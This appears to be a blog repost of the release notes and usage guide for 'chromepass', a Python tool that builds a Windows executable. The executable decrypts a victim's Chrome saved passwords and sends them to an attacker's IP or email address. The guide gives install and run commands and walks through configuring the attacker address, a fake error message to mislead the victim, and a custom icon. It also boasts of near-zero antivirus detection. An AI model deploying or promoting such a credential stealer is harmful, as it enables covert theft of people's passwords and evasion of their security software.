chromepass v4.1.4 releases: Gather Chrome Saved Passwords

Chromepass – Hacking Chrome Saved Passwords

Chromepass is a python-based console application that generates a windows executable with the following features:

• Decrypt Chrome saved passwords
• Send a file with the login/password combinations remotely (email or reverse-http)
• Custom icon
• Completely undetectable by AntiVirus Engines

AV Detection!

The new client build methodology, practically ensures a 0% detection rate, even without AV-evasion tactics. If this becomes false in the future, some methods will be implemented to improve AV evasion.

An example of the latest scans (note: within 10-12 hours we go from 0-2 detections to 32 detections so run the analysis on your own builds):

• VirusTotal Scan 1

Changelog v4.1.4

Bugs fixed:

• Correctly getting LOCALAPPDATA directory, not relying on potentially nonexisting environment variables
• Fixed a bug #39 which made login credentials not send in certain situations
• Backwards compatability with earlier Chromium versions.

Improved:

• Better error messages during build and compilation

Install

git clone https://github.com/darkarp/chromepass.git
cd chromepass
pip install -r requirements.txt

Use

python create_server.py

It will ask you to select between two options:

• (1) via email [To be fixed]
  • This will ask you for an email address and a password
  • It will then ask you if you wish to send to another address or to yourself
  • Next, you’re asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable after the passwords have been transferred.
  • You can then write your own message or leave it blank
  • You’re done! Wait for the executable to be generated and then it’s ready.
• (2) via client.exe [Recommended at the moment]
  • First, you’re asked to input an IP Address for a reverse connection. This is the address that belongs to the attacker. It can be a local IP address or a remote IP Address. If a remote address is chosen, Port Forwarding needs to be in place.
  • You’re then asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable after the passwords have been transferred.
  • You can then write your own message or leave it blank
  • You’re done! Wait for the executables to be generated and then it’s ready.
  • The client.exe must be started before the server_ip.exe. The server_ip.exe is the file the victim receives.
• Note: To set a custom icon, replace icon.ico by the desired icon with the same name and format.

Copyright (c) 2019 Mario Nascimento

Source: https://github.com/darkarp/